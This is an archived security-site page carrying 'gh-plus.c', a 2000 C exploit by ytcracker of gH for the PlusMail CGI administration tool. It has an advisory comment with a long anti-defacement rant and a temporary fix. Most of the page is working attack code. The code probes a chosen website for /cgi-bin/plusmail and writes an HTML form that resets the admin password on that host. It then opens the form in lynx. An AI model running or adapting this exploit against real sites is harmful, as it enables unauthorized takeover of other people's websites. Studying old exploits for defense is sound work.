what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

gh-plus.c

gh-plus.c
Posted Jan 10, 2000
Authored by Ytcracker

Remote exploit for PowerScripts PlusMail (all versions to current). Plusmail is an extremely popular cgi-based administration tool that allows you to remotely administer your website with a graphical control panel interface. The password file, however, is set with permissions rw enabled. All platforms are affected.

tags | exploit, remote, cgi
SHA-256 | 3a4c5c187df76131d4ae05c24665c8c7ee7290abe354df60a05f00210e06f59c

gh-plus.c

Change Mirror Download
/*

[gH Security Advisory]

software affected: PowerScripts PlusMail
versions affected: All versions to current.
discussion: Read report below.

*/

/*

[gH-plus.c]

title: [gH plusmail vulnerability]
date: 01.20.2000
author: ytcracker of gH [phed@felons.org]
comments: plusmail is an extremely popular cgi-based administration
tool that allows you to take control of your website
with a graphical control panel interface. the password
file, however, is set with permissions rw enabled,
therefore granting the authority to change the password
whenever's clever.
the following code will detect the vulnerability and
generate the required html to exploit.
shouts: herf. seven one nine. all of gH. www.mp3.com/category5.

[Advisory Information]

written by: mosthated of gH [most@pure-security.net]
vulnerable: So far, any environment running Plusmail.
report: Noticed plusmail running on multiple operating systems.
The vulnerability lies in the web based tool, which
now that is easily exploited, gives you "ADVANCED CONTROL"
of a target website. Below is the code by ytcracker of gH,
which demonstrates how easy it is to generate the html code
which is executed by your web browser to compromise the
target host. We have noticed this Plus Mail program is widely
used, but have yet to succeed in finding the main site for
Plusmail to acknowledge the developers of the remote
vulnerability.

Most likely this will be ripped out during the online trading,
because of script kids not likely this factual addition, but
never the less, it will be expressed. This exploit was written
to acknowledge security weaknesses, but in no way promotes web
page defacments. If you further use this program to gain access
to anything not normally accessable by yourself, meaning you
script kids, then you are subject to be prosecuted and even get
10 years in prison. Is it honestly worth it to compile this program
and randomly ./hack sites and deface them with this half way
automatted program to put your nick & group on it?
The answer is NO. gh/global hell.. Heard of us?? Seen us on TV??
Read about us?? Most likely.. We've changed and gained knowledge
from the experience....Been there done that.. The world didn't
beleive that a group like this could completely go legit, the IT
professionals figured we would retaliate against the fbi and the
world was scared by misleading media articles about how we are
terrorist and descrutive teens. I ask the world now, who is helping
who? Did the media find this vulnerability? Did the stereotypist
who lable us as "cyber gang members" find this vulnerability and allow
networks around the world to be patched before so called "descrutive
hackers" gained access to them. Answer yet again, NO, we did, not you
who false claim to be helping with security. Your defacements don't
help anything, we thought it did before as well, now we realized that
it does nothing positive. You stereotypist know nothing about gH, yet
can write articles, your wrong. You people think so much that you know
so much about hackers. You know nothing, what you think you know, is
wrong. What you don't know about us, the information is right under
your nose, yet you still can't put your finger on it. Their are 2 sides
to the so called "hacking scene", you people should realize their will
always be a good and a bad side to most matters. Don't exploit the
fact that you don't know anything about the whole situation, just face
the real fact, our knowledge could be a great help to all, why not
accept us as normal people, not untrue off the wall assumptions.
If you use programs like this to deface sites, think before you use
this one, because we have been through the childish fights online
and expressed our feelings, we are still where we started, from square
1 and would not have gone any farther, until we realized that what we
were doing was stupid, pathetic, futureless and illegal. Choose
your path wisely, either stop the script kiddie bullshit or get
your door kicked in, you decide.
fix: Move/Rename the plusmail directory as a temporary fix.

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <fcntl.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sock;
unsigned long vulnip;

struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;

char *detect;
char buffer[1024];
char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://";
char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\"><br>password: <input type=\"password\" name=\"password\"><br>retype password: <input type=\"password\" name=\"password1\"></p><p><input type=\"submit\" name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">pure-security networks</a></p></body></html>";

FILE *html;

printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

if(argc<2)
{
printf(" usage: %s [vulnerable website]\n\n",argv[0]);
exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}

send(sock, plusvuln,strlen(plusvuln),0);
recv(sock, buffer, sizeof(buffer),0);
detect = strstr(buffer,"404");
close(sock);

if( detect != NULL)
{
printf(" vulnerabilty not detected.\n");
exit(0);
}
else
printf(" vulnerability detected. generating html...\n");

html=fopen("plus.html","w+b");
fprintf(html,"%s",htmI);
fprintf(html,"%s",argv[1]);
fprintf(html,"%s",htmII);
fclose(html);

printf(" spawning lynx...\n");

system("lynx plus.html");
return 0;
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close